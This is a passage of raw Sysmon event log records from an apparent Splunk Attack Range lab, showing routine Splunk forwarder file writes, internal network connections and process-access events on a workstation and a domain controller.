Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69C823179B251EB52AA3D7272DDF0792,SHA256=57438226A873100610E61EC66EED45D9C3E2804F46DDEACCC8032AFD78B7B9B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083079Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:52.132{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8DF8872606672AF73B40E364388699C,SHA256=DBC91892A2403410716E58179397893FFA9632E224824C6BFEE40E7A3D1B050E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106653Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:53.878{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1902760AD1DF95B7E60308B7B56EE99F,SHA256=AD30C42EB72B46D042638621DDB0955E493E114560B50C7339C7F21F63B2E1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083080Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:53.132{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B998EC3577FFF923FDED9B1BE04DE6,SHA256=434494684A0558A9430B8279753E53E24199526569445C3A8033CE1B3613750A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106654Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:54.884{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=482D34E80A3762F083E79C736E764153,SHA256=6AA6DE2B5A10AFC7BC39B8727ECE7060B1EB30DF32B430496EDA86F6D630CC6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083082Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:52.624{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50138-false10.0.1.12-8000- 23542300x800000000000000083081Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:54.163{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A61C33A5A182978F40BB9F2A0673DF4,SHA256=D883713F4BCA19FE5EEA0602B5F8A3D71AFF5E3C7A20EE24EBD0F16FB169CFF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106655Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:55.899{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232AF0454D253983AEF2AC3335A2C75B,SHA256=9F3E9F52BFB9EED54732056A163DB1325BDBFE5BA6BC70E28F1D18539D0F2781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083083Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:55.194{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF47694FDA9F99FF2DB5FCE0878A494,SHA256=C30F068EC4E2B83BD3A12FC4E8F34F30D47B95523A793F504E3629C12349199B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106660Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:56.984{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106659Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:56.899{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B49F2564D709F9929AEA47B6A1EF0FDD,SHA256=E1127C123E389D3C327513473397F3A738BBA9D8A4B16513D93DE763ED2624A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083084Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:56.194{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F67FF229799B343FA0BDAF189CA57DFF,SHA256=ADEB5D2B0C553BB8453F00FCA95ACBEC20B746BA2C4F9424E1668B032C81A949,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106658Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:55.373{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51852-false10.0.1.12-8000- 10341000x8000000000000000106657Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:56.184{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106656Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:56.184{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106661Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:57.914{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=560474509241992BED45D79F1E39EAF8,SHA256=C481AF2CB58B2DF7BC3ED7351949BCB663CC2984DC8B9AE980FB88E0F318CA35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083085Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:57.244{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2834D9DC59B1F98B9185A90E1E08209,SHA256=E3EABA1081CB7C9E7C73F00EE30F3058F2F1E65B31BA20C1E77617242D20E42D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106671Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.929{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AB9A0BAA67B4A504908CC329298575F,SHA256=185C1DC1DF6E433B1CDD8D1FA8E3E8DB6A777B130D676FEE28FF4408B36D003E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083086Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:58.291{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D6D22260532FA4BB77ABD81FE113D8E,SHA256=F8635501D0CE3537F6EBB021A33ED2F9E01C47B4BFB89F87464CF2814E73E5F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106670Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:57.209{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51853-false10.0.1.12-8089- 10341000x8000000000000000106669Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B47E-615A-3102-00000000FC01}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106668Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106667Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106666Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106665Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106664Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B47E-615A-3102-00000000FC01}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106663Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B47E-615A-3102-00000000FC01}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106662Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.598{58E9C193-B47E-615A-3102-00000000FC01}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106685Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.950{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A400ACC1F57ABD96DF824C2DCA4B37,SHA256=59A1647EA144A88C86B0CA8DC1DF90B9AEA5117888CF3A81AFE036B2F7F6E3B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083100Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:59.400{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFAC95A2100DB6025F3604F645530FF4,SHA256=2152BA63B655BDA07410E218F5E1479F8D41F9C3413AAD0DBB8A3E0E278DC574,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106684Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.308{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51854-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000106683Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:58.308{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51854-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000106682Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.581{58E9C193-B47F-615A-3202-00000000FC01}65165112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106681Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B47F-615A-3202-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106680Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106679Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106678Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106677Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106676Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B47F-615A-3202-00000000FC01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106675Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:59.397{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B47F-615A-3202-00000000FC01}6516C:\Program 